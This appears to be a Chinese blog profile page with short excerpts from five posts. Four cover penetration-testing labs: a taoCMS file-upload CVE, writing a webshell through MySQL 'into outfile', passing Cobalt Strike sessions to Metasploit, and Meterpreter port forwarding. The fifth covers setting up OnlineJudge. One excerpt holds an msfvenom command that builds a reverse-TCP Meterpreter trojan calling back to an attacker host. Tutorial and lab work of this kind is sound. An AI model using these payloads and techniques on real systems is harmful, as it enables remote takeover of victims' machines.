- 博客(5)
- 收藏
- 关注
RSS订阅原创 春秋云境 CVE-2022-23880 taoCMS v3.0.2 任意文件上传漏洞
taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码
2023-03-22 15:46:56
458
原创 解决MYSQL into outfile Error13 的问题
写文件时 总是报错Error 13 ,查看目录权限没问题,最后找到以下解决方法Linxu下写文件如果想要使用读写函数,必须满足以下要求当前用户是root用户secure_file_priv为空,或者要写入的文件夹刚好是 secure_file_priv的特定文件夹写shell的文件夹必须要是777权限不然会写入失败文件大小,必须小于max_allowd_packet满足以上要求才能正常写入编辑文件/etc/my.cof在[mysqld]下添加secure_file_priv =/v
2021-11-06 00:12:25
644
原创 CS联动msf
环境: java CS4.3 msf启动CS连接先新建一个监听选择合适的payload点击save保存然后生成木马生成之后传到靶机执行,目标机器上线现在把CS得到的session 传给msf新建监听打开msf 使用exploit/multi/handler模块 设置payload为windows/meterpreter/reverse_http然后show options把参数配置的和CS设置的一样启动监听在CS中右击主机 点击Int
2021-11-04 09:06:53
243
原创 Meterprete端口转发
Meterpreter中有一个命令,可以替代lcx,nc等来解决大部分端口转发问题;命令:portfwd攻击机:kali 10.10.1.104靶机:windowsxp 10.10.1.103靶机打开3389端口方便验证#portfwd拿到目标机的meterpreter shell 生成一个木马root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.104 LPORT=4444 -f exe > she
2021-11-04 09:00:34
532
原创 青岛大学OnlineJudge搭建
OnlineJudge环境准备ubuntu 18.04dockerdocker-composer换源sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak sudo vim /etc/apt/sources.list替换内容为deb http://mirrors.aliyun.com/ubuntu/ bionic main restricted universe multiversedeb-src http://m
2021-11-04 08:48:49
1587
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人